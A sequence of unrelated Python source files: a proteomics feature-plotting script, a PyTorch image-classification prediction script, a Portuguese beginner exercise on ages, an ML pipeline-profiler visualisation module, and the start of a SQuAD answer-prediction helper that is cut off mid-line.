import os, re import pandas as pd import numpy as np import matplotlib.pyplot as plt import matplotlib import seaborn as sns # test upset plot for chaperones in each cluster from upsetplot import generate_counts, from_contents from upsetplot import plot from simple_venn import venn4 from matplotlib.colors import LinearSegmentedColormap from loguru import logger from GEN_Utils import FileHandling logger.info('Import OK') peptide_folder = f'results/lysate_denaturation/peptide_features/' protein_folder = f'results/lysate_denaturation/protein_features/' output_folder = f'results/lysate_denaturation/plot_features/' if not os.path.exists(output_folder): os.makedirs(output_folder) cluster_colors = { '1': 'darkorange', '2': 'firebrick', '3': 'rebeccapurple', '4': 'royalblue', '0': 'grey', 1: 'darkorange', 2: 'firebrick', 3: 'rebeccapurple', 4: 'royalblue', 0: 'grey', 'multiple': 'grey', 'clusters': 'black'} font = {'family' : 'normal', 'weight' : 'normal', 'size' : 14 } matplotlib.rc('font', **font) plt.rcParams['svg.fonttype'] = 'none' def generate_plot(df, x_col, y_col, group_col, xlabel, ylabel, title, yrange=False): for group, data in df.groupby(group_col): fig, ax = plt.subplots(figsize=(4, 3)) sns.violinplot(x=x_col, y=y_col, data=data, palette=cluster_colors) plt.setp(ax.collections, alpha=.3) sns.swarmplot(x=x_col, y=y_col, data=data, palette=cluster_colors) if yrange: plt.ylim(*yrange) plt.ylabel(ylabel) plt.xlabel(xlabel) plt.title(f'{group}_{title}') plt.savefig(f'{output_folder}{group}_{title}.png') plt.savefig(f'{output_folder}{group}_{title}.svg') plt.show() # Test better boxplot for plotting def better_boxplot(dataframe, col_to_plot, cluster_col='cluster', cluster_colors=None, order=None, normed=False, title=False, output_folder=output_folder): df = dataframe.copy() if normed: df[col_to_plot] = (df[col_to_plot] - df[col_to_plot].mean()) / df[col_to_plot].std() pop_mean = df[col_to_plot].mean() error_df = df.groupby(cluster_col).mean().reset_index() error_df['error'] = df.groupby(cluster_col).std().reset_index()[col_to_plot] if order: error_df = error_df.set_index([cluster_col]).loc[order] error_df['x_pos'] = np.arange(0, len(error_df)) fig, ax = plt.subplots(figsize=(4, 3)) sns.stripplot(x=df[cluster_col], y=df[col_to_plot], palette=cluster_colors, color=df[cluster_col], alpha=0.5, order=order) # sns.boxplot(x=cluster_col, y=col_to_plot, data=df.groupby(cluster_col).mean().reset_index(), palette=cluster_colors, color=df[cluster_col], linewidth=2, ax=ax, order=order) plt.errorbar(error_df['x_pos'], error_df[col_to_plot], yerr=error_df['error'], ecolor='black', elinewidth=2.0, capsize=10, barsabove=True, capthick=1.0, marker='_', linewidth=0, markersize=20, markeredgecolor='black') ax.axhline(pop_mean, linewidth=1, color='grey', linestyle='--') plt.xlabel(cluster_col) plt.ylabel(col_to_plot) if title: plt.title(title) plt.savefig(f'{output_folder}{title}{col_to_plot}.png') plt.savefig(f'{output_folder}{title}{col_to_plot}.svg') plt.show() def layered_distplot(dataframe, col_to_plot, cluster_col='cluster', cluster_colors=None, order=None, normed=False, title=False, output_folder=output_folder): data = dataframe.copy() if normed: data[col_to_plot] = (data[col_to_plot] - data[col_to_plot].mean()) / data[col_to_plot].std() fig, ax = plt.subplots(len(data[cluster_col].unique()), sharex=True) for i, (group, df) in enumerate(data.groupby(cluster_col)): sns.kdeplot(df[col_to_plot], ax=ax[i], color=cluster_colors[group], shade=True) ax[i].axvline(df[col_to_plot].mean(), color='grey', 
linestyle='--') ax[i].get_legend().remove() plt.xlabel(col_to_plot) plt.ylabel('Density') if title: plt.title(title) # plt.savefig(f'{output_folder}{col_to_plot}.png') plt.show() def generate_protein_heatmap(df, quant_cols, title, cmap='Greys', normed=False, output_folder=output_folder): dataframe = df.copy() if normed: dataframe[quant_cols] = (dataframe[quant_cols] - dataframe[quant_cols].mean()) / dataframe[quant_cols].std() for group, df in dataframe.groupby('group'): fig, ax = plt.subplots(figsize=(4, 3)) sns.heatmap(df.groupby('cluster_filter_type').mean()[quant_cols], cmap=cmap) plt.title(title) plt.savefig(f'{output_folder}{title}_{group}.png') plt.savefig(f'{output_folder}{title}_{group}.svg') plt.show() def generate_heatmap(df, quant_cols, title, cluster_col='cluster', cmap='Greys', center=None, vmin=None, vmax=None, normed=False, output_folder=output_folder): dataframe = df.copy() if normed: dataframe[quant_cols] = (dataframe[quant_cols] - dataframe[quant_cols].mean()) / dataframe[quant_cols].std() fig, ax = plt.subplots(figsize=(4, 3)) sns.heatmap(dataframe.groupby(cluster_col).mean()[quant_cols], cmap=cmap, center=center, vmin=vmin, vmax=vmax) plt.title(title) plt.savefig(f'{output_folder}{title}.png') plt.savefig(f'{output_folder}{title}.svg') plt.show() # ---------------predicted peptide features--------------- if not os.path.exists(f'{output_folder}peptides/'): os.makedirs(f'{output_folder}peptides/') # read in features peptide_predicted = pd.read_excel(f'{peptide_folder}predicted_features_summary.xlsx', sheet_name='compiled_data') peptide_predicted.drop([col for col in peptide_predicted.copy().columns.tolist() if 'Unnamed: ' in col], axis=1, inplace=True) # Map colours - in the case of peptides, using the 'mixed' col # as this relates to the specific peptides added to each cluster cols_to_plot = ['Polar', 'Neutral', 'Hydrophobic', 'Low', 'Medium', 'High', 'charge_positive', 'charge_neutral', 'charge_negative', 'Helix', 'Strand', 'Coil', 'Buried', 'Exposed', 'Intermediate', 'polar_sum', 'hydrophobic_sum'] for title, group_cols in {'Amino acid class': ['Polar', 'Neutral', 'Hydrophobic'], 'Hydrophobicity': ['Low', 'Medium', 'High'], 'Charge': ['charge_positive', 'charge_neutral', 'charge_negative'], 'Secondary structure': ['Helix', 'Strand', 'Coil'], 'Solvent exposure': ['Buried', 'Exposed', 'Intermediate']}.items(): # generate_heatmap(peptide_predicted, group_cols, title=title, cmap='Greys', normed=False, output_folder=output_folder) generate_heatmap(peptide_predicted, group_cols, title=f'Peptide {title}', cmap=sns.diverging_palette(180, 300, sep=80, n=7), center=0, vmin=-0.1, vmax=0.1, normed=True, output_folder=f'{output_folder}peptides/') # --------------------calculated peptide features-------------------- peptide_calculated = pd.read_excel(f'{peptide_folder}calculated_peptide_features_summary.xlsx', sheet_name=None) peptide_calculated.update({key: value.drop([col for col in value.copy().columns.tolist() if 'Unnamed: ' in str(col)], axis=1) for key, value in peptide_calculated.items()}) # Proportion of peptides in each cluster mapped to PDB residue mapped = peptide_calculated['mapped_chi_observed'].copy().drop('feature_legend', axis=1).T.reset_index().rename(columns={'index':'cluster'}) mapped['proportion'] = mapped[1] / mapped[0] * 100 fig, ax = plt.subplots(figsize=(4, 3)) sns.barplot(x=mapped['cluster'], y=mapped['proportion'], color=mapped['proportion'], palette=cluster_colors) plt.ylim(0, 100) plt.ylabel('Proportion of peptides with PDB structures') 
plt.xlabel('Cluster') plt.savefig(f'{output_folder}mapped_peptides.png') plt.savefig(f'{output_folder}mapped_peptides.svg') # secondary structure structure = peptide_calculated['dssp_structure_chi_observed'].copy().set_index('dssp_simple_structure') structure_proportions = structure.copy() / structure.sum() * 100 structure_proportions = pd.melt(structure_proportions.reset_index(), id_vars='dssp_simple_structure', value_vars=structure_proportions.columns, var_name='cluster', value_name='percent').fillna(0) # H = α-helix # B = residue in isolated β-bridge # E = extended strand, participates in β ladder # G = 3-helix (310 helix) # I = 5 helix (π-helix) # T = hydrogen bonded turn # S = bend # Define some colours colours = {'turn': '#46474a', 'strand': '#84868a', 'helix': '#5f6163', 'bend': '#a6a8ab', '-': '#232324'} structure_proportions['baseline'] = 0 baselines = dict(zip(structure_proportions['cluster'], structure_proportions['baseline'])) fig, ax = plt.subplots(figsize=(4, 3)) for x, (structure, df) in enumerate(structure_proportions.groupby('dssp_simple_structure')): logger.info(x) position = (len(structure_proportions['dssp_simple_structure'].unique()) - x) df['baseline'] = df['cluster'].map(baselines) df['percent'] = df['baseline'] + df['percent'] sns.barplot(x='cluster', y='percent', data=df, color=colours[structure], label=structure, zorder=position, ax=ax) baselines.update(dict(zip(df['cluster'], df['percent']))) ax.set_ylim(0, 100) handles, labels = ax.get_legend_handles_labels() ax.legend(handles[::-1], labels[::-1], title='Structure', bbox_to_anchor=(1.0, 1.0)) plt.xlabel('Cluster') plt.ylabel('Proportion of mapped structures') plt.savefig(f'{output_folder}cys_residues_simplestructure.png', dpi=500) plt.savefig(f'{output_folder}cys_residues_simplestructure.svg') plt.show() # asa calculated_asa = peptide_calculated['compiled_clustered'].copy() for col in ['pdb_asa', 'dssp_asa']: better_boxplot(calculated_asa, col, cluster_col='cluster', cluster_colors=cluster_colors, normed=False, title=f'Peptide _', output_folder=f'{output_folder}') layered_distplot(calculated_asa, col, cluster_col='cluster', cluster_colors=cluster_colors, normed=False, title=f'Peptide_', output_folder=f'{output_folder}') # site info - residue features residue_features = peptide_calculated['residue_features_chi_observed'].copy().set_index('feature_legend') residue_features_proportions = residue_features.copy() / residue_features.sum() * 100 residue_features_proportions = pd.melt(residue_features_proportions.reset_index(), id_vars='feature_legend', value_vars=residue_features_proportions.columns, var_name='cluster', value_name='percent').fillna(0) residue_features_proportions = residue_features_proportions[residue_features_proportions['feature_legend'] == 1] fig, ax = plt.subplots(figsize=(4, 3)) sns.barplot(x=residue_features_proportions['cluster'], y=residue_features_proportions['percent'], color=residue_features_proportions['cluster'], palette=cluster_colors, order=[1, 2, 3, 4]) plt.ylabel('Proportion of peptides\nwith residue feature') plt.xlabel('Type') plt.savefig(f'{output_folder}residue_features.png') plt.savefig(f'{output_folder}residue_features.svg') plt.show() # site info - domain features domain_features = peptide_calculated['domain_features_chi_observed'].copy().set_index('feature_legend') domain_features_proportions = domain_features.copy() / domain_features.sum() * 100 domain_features_proportions = pd.melt(domain_features_proportions.reset_index(), id_vars='feature_legend', 
value_vars=domain_features_proportions.columns, var_name='cluster', value_name='percent').fillna(0) domain_features_proportions = domain_features_proportions[domain_features_proportions['feature_legend'] == 2] fig, ax = plt.subplots(figsize=(4, 3)) sns.barplot(x=domain_features_proportions['cluster'], y=domain_features_proportions['percent'], color=domain_features_proportions['cluster'], palette=cluster_colors, order=[1, 2, 3, 4]) plt.ylabel('Proportion of peptides\nwith domain feature') plt.xlabel('Type') plt.savefig(f'{output_folder}domain_features.png') plt.savefig(f'{output_folder}domain_features.svg') plt.show() # site info - PFAM domains domain_features = peptide_calculated['pfam_chi_observed'].copy().set_index('feature_legend') domain_features_proportions = domain_features.copy() / domain_features.sum() * 100 domain_features_proportions = pd.melt(domain_features_proportions.reset_index(), id_vars='feature_legend', value_vars=domain_features_proportions.columns, var_name='cluster', value_name='percent').fillna(0) domain_features_proportions = domain_features_proportions[domain_features_proportions['feature_legend'] == 1] fig, ax = plt.subplots(figsize=(4, 3)) sns.barplot(x=domain_features_proportions['cluster'], y=domain_features_proportions['percent'], color=domain_features_proportions['cluster'], palette=cluster_colors, order=[1, 2, 3, 4]) plt.ylabel('Proportion of residues\nlocated in PFAM domain') plt.xlabel('Cluster') plt.savefig(f'{output_folder}pfam_domains.png') plt.savefig(f'{output_folder}pfam_domains.svg') plt.show() # ---------------predicted protein features--------------- if not os.path.exists(f'{output_folder}proteins/'): os.makedirs(f'{output_folder}proteins/') order=[1, 2, 3, 4, 'multiple'] # read in features protein_predicted = pd.read_excel(f'{protein_folder}predicted_features_anova.xlsx', sheet_name='compiled_data') protein_predicted.drop([col for col in protein_predicted.copy().columns.tolist() if 'Unnamed: ' in col], axis=1, inplace=True) # Map colours - in the case of peptides, using the 'mixed' col # as this relates to the specific peptides added to each cluster cols_to_plot = ['Polar', 'Neutral', 'Hydrophobic', 'Low', 'Medium', 'High', 'charge_positive', 'charge_neutral', 'charge_negative', 'Helix', 'Strand', 'Coil', 'Buried', 'Exposed', 'Intermediate', 'polar_sum', 'hydrophobic_sum'] for title, group_cols in {'Amino acid class': ['Polar', 'Neutral', 'Hydrophobic'], 'Hydrophobicity': ['Low', 'Medium', 'High'], 'Charge': ['charge_positive', 'charge_neutral', 'charge_negative'], 'Secondary structure': ['Helix', 'Strand', 'Coil'], 'Solvent exposure': ['Buried', 'Exposed', 'Intermediate']}.items(): # generate_heatmap(protein_predicted, group_cols, title=title, cmap='Greys', normed=False, output_folder=output_folder) generate_heatmap(protein_predicted, group_cols, cluster_col='unique', title=f'Protein {title}', cmap=sns.diverging_palette(180, 300, sep=80, n=7), center=0, vmin=-0.3, vmax=0.3, normed=True, output_folder=f'{output_folder}proteins/') protein_disorder = pd.read_excel(f'{protein_folder}disorder_prediction_kruskal.xlsx', sheet_name='compiled_data') protein_disorder.drop([col for col in protein_disorder.copy().columns.tolist() if 'Unnamed: ' in col], axis=1, inplace=True) protein_disorder['unique'] = protein_disorder['unique'] better_boxplot(protein_disorder[protein_disorder['disordered'] == 1], 'proportion', cluster_col='unique', cluster_colors=cluster_colors, order=order, normed=False, title=f'protein_disorder') 
layered_distplot(protein_disorder[protein_disorder['disordered'] == 1], 'proportion', cluster_col='unique', cluster_colors=cluster_colors, normed=False, title=f'protein_disorder') # --------------------protein features-------------------- order=[1, 2, 3, 4, 'multiple'] peptides = pd.read_excel(f'{protein_folder}calculated_protein_features_summary.xlsx', sheet_name=None) molweight = peptides['len_mw_summary'].copy() molweight['kda'] = molweight['MW'] / 1000 better_boxplot(molweight, 'kda', cluster_col='unique', cluster_colors=cluster_colors, order=order, normed=False, title=f'mol_weight', output_folder=output_folder) # Molecular weight fig, ax = plt.subplots(figsize=(4, 3)) # sns.violinplot(x=molweight['unique'], y=molweight['kda'], color=molweight['unique'], palette=cluster_colors, order=[1, 2, 3, 4, 'multiple']) # plt.setp(ax.collections, alpha=.3) sns.boxplot(x=molweight['unique'], y=molweight['kda'], color='white', order=order, fliersize=0) sns.swarmplot(x=molweight['unique'], y=molweight['kda'], color=molweight['unique'], palette=cluster_colors, order=order, alpha=0.5) plt.ylabel('Molecular weight (kDa)') plt.xlabel('Cluster') plt.savefig(f'{output_folder}MolWeight_unique.png') plt.savefig(f'{output_folder}MolWeight_unique.svg') plt.show() better_boxplot(molweight, 'length', cluster_col='unique', cluster_colors=cluster_colors, order=order, normed=False, title=f'length', output_folder=output_folder) # Length fig, ax = plt.subplots(figsize=(4, 3)) # sns.violinplot(x=molweight['unique'], y=molweight['kda'], color=molweight['unique'], palette=cluster_colors, order=[1, 2, 3, 4, 'multiple']) # plt.setp(ax.collections, alpha=.3) sns.boxplot(x=molweight['unique'], y=molweight['length'], color='white', order=order, fliersize=0) sns.swarmplot(x=molweight['unique'], y=molweight['length'], color=molweight['unique'], palette=cluster_colors, order=order, alpha=0.5) plt.ylabel('Protein Length') plt.xlabel('Cluster') plt.savefig(f'{output_folder}protein_length_unique.png') plt.savefig(f'{output_folder}protein_length_unique.svg') plt.show() # PFAM domains fig, ax = plt.subplots(figsize=(4, 3)) # sns.violinplot(x=molweight['unique'], y=molweight['kda'], color=molweight['unique'], palette=cluster_colors, order=[1, 2, 3, 4, 'multiple']) # plt.setp(ax.collections, alpha=.3) sns.swarmplot(x=molweight['unique'], y=molweight['pfam_id'], color=molweight['unique'], palette=cluster_colors, order=order, alpha=0.5) sns.boxplot(x=molweight['unique'], y=molweight['pfam_id'], color='white', order=order, fliersize=0) plt.ylabel('Number of PFAM domains') plt.xlabel('Cluster') plt.savefig(f'{output_folder}protein_pfam_unique.png') plt.savefig(f'{output_folder}protein_pfam_unique.svg') plt.show() # Protein venn diagram - Note cluster colours are slightly off here - need to add manually for now protein_venn = pd.read_excel(f'{protein_folder}protein_venn.xlsx') protein_venn.drop([col for col in protein_venn.columns.tolist() if 'Unnamed: ' in str(col)], axis=1, inplace=True) protein_venn['cluster'] = protein_venn['name'].str.split(' ').str[-1] labels = protein_venn['name'][0:np.max([len(x) for x in protein_venn['cluster']])] fig, ax = plt.subplots(figsize=(4, 3)) # venn4(protein_venn['count'], set_labels=labels, set_colors=[cluster_colors[cluster.split(' ')[-1]] for cluster in labels], ax=ax) venn4(protein_venn['count'], set_labels=labels, set_colors=['royalblue', 'rebeccapurple', 'darkorange', 'firebrick'], ax=ax) plt.savefig(f'{output_folder}protein_clustered_venn.png') 
plt.savefig(f'{output_folder}protein_clustered_venn.svg') plt.show() # Chaperone venn diagram - Note cluster colours are slightly off here - need to add manually for now chaperones = pd.read_excel(f'{protein_folder}chaperone_enrichment_summary.xlsx', sheet_name=None) chaperones.update({key: value.drop([col for col in value.columns.tolist() if 'Unnamed: ' in str(col)], axis=1) for key, value in chaperones.items()}) chaperone_counts = chaperones['overlap'] chaperone_counts['cluster'] = chaperone_counts['name'].str.split(' ').str[-1] labels = chaperone_counts['name'][0:np.max([len(x) for x in chaperone_counts['cluster']])] fig, ax = plt.subplots(figsize=(4, 3)) # venn4(chaperone_counts['count'], set_labels=labels, set_colors=[cluster_colors[cluster.split(' ')[-1]] for cluster in labels], ax=ax) venn4(chaperone_counts['count'], set_labels=labels, set_colors=['royalblue', 'rebeccapurple', 'darkorange', 'firebrick'], ax=ax) plt.savefig(f'{output_folder}chaperone_clustered_venn.png') plt.savefig(f'{output_folder}chaperone_clustered_venn.svg') plt.show() # Generate upset plot clustered_chaperones = chaperones['clustered_chaperones'].copy() clustered_chaperones = clustered_chaperones[clustered_chaperones['chaperone'] == 1] chaperone_membership = {str(cluster): df['Proteins'].unique().tolist() for cluster, df in clustered_chaperones.groupby('cluster')} counts = from_contents(chaperone_membership) plot(counts) plt.savefig(f'{output_folder}chaperone_upset.png') plt.savefig(f'{output_folder}chaperone_upset.svg') plt.show() # Generate heatmap representation chaperone_details = chaperones['chaperone_details'].copy()[['Proteins', 'mixed', 'Gene names']] chaperone_details['name'] = chaperone_details['Gene names'].str.split(' ').str[0].str.upper() chaperone_heatmap = counts.reset_index() chaperone_heatmap['cluster_num'] = chaperone_heatmap.sum(axis=1) for col in chaperone_heatmap.set_index(['id', 'cluster_num']).columns.tolist(): chaperone_heatmap[col] = [int(col) if val else np.nan for val in chaperone_heatmap[col]] chaperone_heatmap['name'] = chaperone_heatmap['id'].map(dict(chaperone_details[['Proteins', 'name']].values)) chaperone_heatmap.sort_values(['cluster_num', 'name'], inplace=True) cmap = LinearSegmentedColormap.from_list('clusters', ['darkorange', 'firebrick', 'rebeccapurple', 'royalblue'], 4) fig, ax = plt.subplots(figsize=(5, 20)) sns.heatmap(chaperone_heatmap.set_index('name')[['1', '2', '3', '4']], cmap=cmap) plt.xlabel('Cluster') plt.savefig(f'{output_folder}chaperone_heatmap.png') plt.savefig(f'{output_folder}chaperone_heatmap.svg') # Visualise count of chaperones represented in each cluster chaperone_proportions = chaperones['chaperones_chi_obs'].copy().set_index('chaperone').T.reset_index().rename(columns={'index': 'unique'}) chaperone_proportions['names'] = [sorted(clustered_chaperones[clustered_chaperones['unique'] == cluster]['Proteins'].map(dict(chaperone_details[['Proteins', 'name']].values)).unique().tolist()) for cluster in chaperone_proportions['unique']] chaperone_proportions['percent'] = round(chaperone_proportions[1] / (chaperone_proportions[0]+chaperone_proportions[1]) * 100, 1) fig, ax = plt.subplots(figsize=(6, 5)) sns.barplot(x='unique', y=1, data=chaperone_proportions, order=[1, 2, 3, 4, 'multiple'], color='unique', palette=cluster_colors) # add annotations for proteins in each bar for x, cluster in enumerate([1, 2, 3, 4, 'multiple']): names = chaperone_proportions[chaperone_proportions['unique'] == cluster]['names'].tolist()[0] for y, name in enumerate(names): 
plt.annotate(name, (x-0.25, y+0.15), color='white', size=8) # add percent of total proteins for x, cluster in enumerate([1, 2, 3, 4, 'multiple']): percent = chaperone_proportions[chaperone_proportions['unique'] == cluster]['percent'].tolist()[0] max_val = chaperone_proportions[chaperone_proportions['unique'] == cluster][1].tolist()[0] plt.annotate(f'{percent}%', (x-0.2, max_val + 1), color='black', size=8) plt.ylim(-0.9, 20.1) plt.yticks(np.arange(0, 21, 2)) plt.ylabel('Number of chaperones') plt.xlabel('Cluster') plt.savefig(f'{output_folder}chaperone_count.png') plt.savefig(f'{output_folder}chaperone_count.svg')
import torch import numpy as np from torch import nn from torchvision import datasets, models, transforms from PIL import Image import argparse import json parser = argparse.ArgumentParser() parser.add_argument('image_dir', help = 'Provide path to image', type = str) parser.add_argument('load_dir', help = 'Provide path to checkpoint', type = str) parser.add_argument('--top_k', help = 'To get top K most likely classes, enter a number (K). ', type = int) parser.add_argument('--category_names', help = 'Provide JSON file name for mapping of categories to real names', type = str) parser.add_argument('--gpu', help = "To choose to train the model on GPU, type cuda", type = str) args = parser.parse_args() if args.category_names: with open(args.category_names, 'r') as f: cat_to_name = json.load(f) else: with open('cat_to_name.json', 'r') as f: cat_to_name = json.load(f) def load_model(file_path): checkpoint = torch.load(file_path) if checkpoint['arch'] == 'alexnet': model = models.alexnet(pretrained = True) else: model = models.densenet121(pretrained = True) for param in model.parameters(): param.requires_grad = False model.classifier = checkpoint['classifier'] model.load_state_dict(checkpoint['state_dict']) model.class_to_idx = checkpoint['class_to_idx'] return model def process_image(image): p_image = Image.open(image) transform = transforms.Compose([transforms.Resize(255), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) final_image = transform(p_image) return final_image def predict(image_path, model, top_k, device): final_image = process_image(image_path) if device == 'cuda': final_image = final_image.type(torch.cuda.FloatTensor) else: final_image = final_image final_image.unsqueeze_(0) model.to(device) final_image.to(device) model.eval() with torch.no_grad(): ps = torch.exp(model.forward(final_image)) top_probs, top_indices = ps.topk(top_k) top_probs = top_probs.cpu() top_indices = top_indices.cpu() top_probs = top_probs[0].numpy() idx_to_class = {} for key, value in model.class_to_idx.items(): idx_to_class[value] = key np_top_indices = top_indices[0].numpy() top_labels = [] for idx in np_top_indices: top_labels.append(int(idx_to_class[idx])) return top_probs, top_labels image_path = args.image_dir model = load_model(args.load_dir) if args.top_k: top_k = args.top_k else: top_k = 1 if args.gpu == 'cuda': device = 'cuda' else: device = 'cpu' top_probs, top_labels = predict(image_path, model, top_k, device) top_classes = [cat_to_name[str(lab)] for lab in top_labels] for k in range(top_k): print("Number: {}/{}.. ".format(k+1, top_k), "Class name: {}.. ".format(top_classes[k]), "Probability: {:.2f} % ".format(top_probs[k]*100) )
# Reads data for four people and reports the average age, how many women are under
# 20 years old, and the name and age of the oldest man.
somaidade = 0
mediaidade = 0
idademulher = 0
maioridadehomem = 0
nomevelho = ''
for p in range(1, 5):
    nome = str(input('digite o nome da {} pessoa: '.format(p)))
    idade = int(input('digite a idade da {} pessoa: '.format(p)))
    sexo = str(input('digite o sexo da {} pessoa: [M/F] '.format(p)))
    print('--------------------------------------')
    somaidade += idade
    # Count women younger than 20; accept 'F' or 'f', matching how men are handled below.
    if idade < 20 and sexo in 'Ff':
        idademulher += 1
    if p == 1 and sexo in 'Mm':
        maioridadehomem = idade
        nomevelho = nome
    if sexo in 'Mm' and maioridadehomem < idade:
        maioridadehomem = idade
        nomevelho = nome
mediaidade = somaidade / 4
print('a idade media é de {}'.format(mediaidade))
print('{} mulhere(s) tiveram idade abaixo de 20 anos'.format(idademulher))
print('o homem mais velho tem {} anos de idade e se chama {}'.format(maioridadehomem, nomevelho))
print('--------------------------------------')
import pkg_resources import string import numpy as np from dateutil.parser import parse import json import networkx as nx from ._graph_matching import pipeline_to_graph, merge_multiple_graphs from ._powerset_analysis import compute_group_importance from ._comm_api import setup_comm_api from collections import defaultdict import copy exportedPipelines = [] def comm_powerset_analysis(msg): pipelines = msg['pipelines'] scores = msg['scores'] analysis = compute_group_importance(pipelines, scores, 2) return {"analysis": analysis} setup_comm_api('powerset_analysis_comm_api', comm_powerset_analysis) def comm_merge_graphs(msg): pipelines = msg['pipelines'] graphs = [pipeline_to_graph(pipeline, pipeline['pipeline_digest']) for pipeline in pipelines] merged = merge_multiple_graphs(graphs) data_dict = nx.readwrite.json_graph.node_link_data(merged) return {"merged": data_dict} setup_comm_api('merge_graphs_comm_api', comm_merge_graphs) def comm_export_pipelines(msg): global exportedPipelines exportedPipelines = msg['pipelines'] return {} setup_comm_api('export_pipelines_comm_api', comm_export_pipelines) def get_exported_pipelines(): global exportedPipelines return exportedPipelines def id_generator(size=15): """Helper function to generate random div ids. This is useful for embedding HTML into ipython notebooks.""" chars = list(string.ascii_uppercase) return ''.join(np.random.choice(chars, size, replace=True)) def make_html(data_dict, id): lib_path = pkg_resources.resource_filename(__name__, "build/pipelineVis.js") bundle = open(lib_path, "r", encoding="utf8").read() html_all = """ <html> <head> </head> <body> <script> {bundle} </script> <div id="{id}"> </div> <script> pipelineVis.renderPipelineMatrixBundle("#{id}", {data_dict}); </script> </body> </html> """.format(bundle=bundle, id=id, data_dict=json.dumps(data_dict)) return html_all def extract_primitive_names(pipeline): return [s['primitive']['python_path'] for s in pipeline['steps']] def extract_module_matrix(pipelines): from sklearn import preprocessing import numpy as np le = preprocessing.LabelEncoder() all_primitives = set() for pipeline in pipelines: all_primitives = all_primitives.union(extract_primitive_names(pipeline)) le.fit(list(all_primitives)) data_matrix = np.zeros([len(pipelines), len(le.classes_)]) for i, pipeline in enumerate(pipelines): for j, primitive in enumerate(extract_primitive_names(pipeline)): idx_primitive = le.transform([primitive]) data_matrix[i, idx_primitive] = 1 return data_matrix, le.classes_ def extract_scores(pipelines): scores = [] for pipeline in pipelines: score = pipeline['scores'][0]['value'] scores.append(score) return np.array(scores) def rename_pipelines(pipelines): sourceMap = defaultdict(lambda: 1) for pipeline in pipelines: source = pipeline['pipeline_source']['name'] pipeline['pipeline_source']['name'] = '{} #{}'.format(source, sourceMap[source]) sourceMap[source] += 1 def transform_module_type(module_type): map = { 'feature_extraction': 'Feature Extraction', 'learner': 'Classification', 'normalization': 'Preprocessing', 'feature_construction': 'Feature Selection', 'classification': 'Classification', 'data_transformation': 'Preprocessing', 'schema_discovery': 'Preprocessing', 'data_preprocessing': 'Preprocessing', 'data_cleaning': 'Preprocessing', 'regression': 'Regression', 'operator': 'Operator', 'feature_selection': 'Feature Selection', 'semisupervised_classification': 'Classification', 'natural_language_processing': 'NLP', 'time_series_forecasting': 'Forecasting', 'time_series_classification': 'TS 
Classification', 'time_series_segmentation': 'Feature Extraction' } if module_type in map: return map[module_type] else: return ' '.join([n.capitalize() for n in module_type.split("_")]) def extract_primitive_info(pipelines, enet_alpha, enet_l1): module_matrix, module_names = extract_module_matrix(pipelines) scores = extract_scores(pipelines) infos = {} module_types = set() for pipeline in pipelines: for step in pipeline['steps']: python_path = step['primitive']['python_path'] if python_path in infos: continue split = python_path.split(".") module_desc = step['primitive']['name'] module_type = transform_module_type(split[2]) module_types.add(module_type) module_name = split[3] infos[python_path] = { "module_desc": module_desc, "module_type": module_type, "module_name": module_name, } return infos, module_types def extract_d3m_time_metric(pipelines): for pipeline in pipelines: if 'end' in pipeline and 'start' in pipeline: # using D3M prediction time format diff = parse(pipeline['end']) - parse(pipeline['start']) diff_sec = diff.total_seconds() pipeline['scores'].append({ 'metric': {'metric': 'PRED TIME (s)'}, 'normalized': diff_sec, 'value': diff_sec, }) def compute_metric_map(pipelines): for pipeline in pipelines: pipeline['score_map'] = {} for score in pipeline['scores']: pipeline['score_map'][score['metric']['metric']] = score def prepare_data_pipeline_matrix(pipelines, enet_alpha=0.001, enet_l1=0.1): pipelines = copy.deepcopy(pipelines) extract_d3m_time_metric(pipelines) compute_metric_map(pipelines) pipelines = sorted(pipelines, key=lambda x: x['scores'][0]['normalized'], reverse=True) rename_pipelines(pipelines) info, module_types = extract_primitive_info(pipelines, enet_alpha=enet_alpha, enet_l1=enet_l1) data = { "infos": info, "pipelines": pipelines, "module_types": list(module_types), } return data def get_pipeline_profiler_html(pipelines): id = id_generator() data_dict = prepare_data_pipeline_matrix(pipelines) html_all = make_html(data_dict, id) return html_all def plot_pipeline_matrix(pipelines): from IPython.core.display import display, HTML id = id_generator() data_dict = prepare_data_pipeline_matrix(pipelines) html_all = make_html(data_dict, id) display(HTML(html_all))
# Copyright 2022 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """get predictions for squad""" import math import collections def get_prelim_predictions(features, unique_id_to_result, n_best_size, max_answer_length): """get prelim predictions""" _PrelimPrediction = collections.namedtuple( "PrelimPrediction", ["feature_index", "start_index", "end_index", "start_logit", "end_logit"]) prelim_predictions = [] # keep track of the minimum score of null start+end of position 0 for (feature_index, feature) in enumerate(features): if feature.unique_id not in unique_id_to_result: continue result = unique_id_to_result[feature.unique_id] start_indexes = _get_best_indexes(result.start_logits, n_best_size) end_indexes = _get_best_indexes(result.end_logits, n_best_size) # if we could have irrelevant answers, get the min score of irrelevant for start_index in start_indexes: for end_index in end_indexes: # We could hypothetically create invalid predictions, e.g., predict # that the start of the span is in the question. We throw out all # invalid predictions. if start_index >= len(feature.tokens): continue if end_index >= len(feature.tokens): continue if start_index not in feature.token_to_orig_map: continue if end_index not in feature.token_to_orig_map: continue if not feature.token_is_max_context.get(start_index, False): continue if end_index < start_index: continue length = end_index - start_index + 1 if length > max_answer_length: continue prelim_predictions.append( _PrelimPrediction( feature_index=feature_index, start_index=start_index, end_index=end_index, start_logit=result.start_logits[start_index], end_logit=result.end_logits[end_index])) prelim_predictions = sorted( prelim_predictions, key=lambda x: (x.start_logit + x.end_logit), reverse=True) return prelim_predictions def get_nbest(args, prelim_predictions, features, example, n_best_size, do_lower_case): """get nbest predictions""" _NbestPrediction = collections.namedtuple( "NbestPrediction", ["text", "start_logit", "end_logit"]) seen_predictions = {} nbest = [] for pred in prelim_predictions: if len(nbest) >= n_best_size: break feature = features[pred.feature_index] if pred.start_index > 0: # this is a non-null prediction tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)] final_text = args.tokenizer.convert_tokens_to_string(tok_tokens).strip() if final_text in 